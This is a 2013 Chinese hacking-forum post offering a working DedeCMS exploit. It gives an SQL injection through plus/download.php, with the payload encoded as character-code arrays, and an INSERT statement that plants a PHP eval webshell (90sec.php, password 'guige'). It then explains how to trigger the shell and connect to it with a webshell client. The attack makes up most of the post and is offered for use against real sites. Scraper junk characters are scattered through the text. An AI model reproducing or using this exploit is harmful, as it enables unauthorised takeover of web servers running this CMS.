中国网络渗透测试联盟

标题: dedecms漏洞getshell EXP最新 [打印本页]

作者: admin    时间: 2013-6-10 16:49
标题: dedecms漏洞getshell EXP最新
本帖最后由 土豆 于 2013-6-10 14:41 编辑 ) P) M+ s% }. a% X9 {# z

( v9 K2 W9 [$ U- M% |2 [/ u) b5 f5 w/ X, X  S
作者:鬼哥
' G" v9 v: D4 v+ x
" n# I2 E' |7 R) S5 K& r' K% W看贴不回,没JJ
  Q+ a8 }& ]3 J; f, {/ X6 h8 }2 ?$ d( n$ y1 Y* m6 L& G3 y6 m9 Y' `
漏洞大家都知道是哪个。& Q* }+ x: ~/ e+ O! y0 f% L
' \3 P1 O( y3 c( E
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
* [% q% i- c7 H+ m# O* x+ c
( m9 J" G, y0 M# }7 q, _. s' a& t但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。+ ~" Q; |' D! e
8 s, b% C- q# H! Q9 m
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?2 Q  Q% A$ t# D

; f6 U( i- @- Y& ygetshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。* ^4 _$ v) M! `9 ]; e

! g% V+ k, ^0 N& L- u' b但是测试了下。。失败
, @/ d) w5 X* W) R" @! C
, }# _, v4 E) e9 u4 h" R原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。8 t, U3 I/ s* X3 p  p3 u" h

8 m8 g5 h. P2 ~构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`1 X9 N+ h& |' D+ i5 ]) O
3 [0 e4 v" a! R* t. O
EXP:& z: |6 i" C( B+ ^  K& m# S+ j

: Q) I) m% x4 Q& o: J3 Mhttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96+ F0 r7 ^) g) J9 d& l7 X, Y- N  ^: p/ I

& {. w. |# s" g! Y/ j1 X. k1 v. |$ l3 `. U- H8 s
成功增加。) G; k3 n" ~% s8 _0 \6 F  r$ q
" a! Z! V& j/ ?4 `
访问http://www.xxx.com/plus/mytag_js.php?aid=90133 ?2 Z6 s' c' L8 |3 N6 a
生成一句话木马.7 m5 |) e7 G" s; Q2 K6 J" t
菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
6 a, N7 w0 ^; R3 A8 O3 n7 j. X
( A: B; D6 D$ B# W测试OK。 . f+ [2 I8 v8 W, ^
# E/ }( U' X8 |3 P4 C

3 w2 s$ X+ K) ?$ H0 u3 j




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2